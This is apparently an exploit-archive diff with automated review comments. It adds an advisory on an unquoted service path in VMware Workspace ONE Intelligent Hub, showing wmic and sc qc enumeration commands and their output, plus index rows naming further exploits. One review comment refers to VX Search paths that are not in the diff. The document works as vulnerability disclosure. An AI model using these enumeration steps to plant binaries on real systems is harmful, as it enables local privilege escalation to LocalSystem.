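Review bot: The `wmic`/`sc qc` output establishes only the precondition (`C:\Program Files\VX Search Server\bin\vxsrchs.exe` unquoted, `AUTO_START`, account `LocalSystem`); whether an unprivileged user can create `C:\Program Files\VX.exe` or `C:\Program Files\VX Search.exe` is not shown, and on default ACLs they cannot. Adding `icacls "C:\Program Files\VX Search Server"` and `icacls "C:\Program Files\VX Search Enterprise"`, together with a sentence noting that a service or host restart is needed before the hijack runs, would let the reader confirm the path is actually exploitable rather than merely misconfigured.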
@@ -0,0 +1,28 @@
+# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 06-16-2021
+# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html
+# Software Links : https://getwsone.com/
+# Tested Version: 20.3.8.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Enterprise 64 bits
+
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+VMware Hub Health Monitoring Service VMware Hub Health Monitoring Service C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe Auto
+
+C:\>sc qc "VMware Hub Health Monitoring Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: VMware Hub Health Monitoring Service
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : VMware Hub Health Monitoring Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 11e0e5685..14dbf1531 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
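Review bot: The unquoted path `C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe` has its only spaces inside `Program Files (x86)`, so the candidate hijack files are `C:\Program.exe` and `C:\Program Files.exe` in the drive root, which by default standard users cannot create on Windows 10 (the root ACL normally allows them to create folders there, not files). The advisory should show `icacls C:\` output, or explain which non-default ACL makes this exploitable, and note that the service must be restarted (`TIPO_INICIO : 2 AUTO_START` means at boot) before a planted binary would run as `LocalSystem`; without that evidence the entry is a hardening note rather than a demonstrated local privilege escalation.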
@@ -11370,6 +11370,11 @@ id,file,description,date,author,type,platform,port
 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
 50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows,
 50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows,
+50023,exploits/windows/local/50023.txt,"Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50024,exploits/windows/local/50024.txt,"Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50026,exploits/windows/local/50026.txt,"VX Search 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows,
+50028,exploits/windows/local/50028.txt,"Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path",2021-06-17,"Ismael Nava",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44172,3 +44177,6 @@ id,file,description,date,author,type,platform,port
 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php,
 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php,
 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,
+50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,
+50027,exploits/java/webapps/50027.py,"Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration",2021-06-17,"Ricardo Ruiz",webapps,java,
+50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,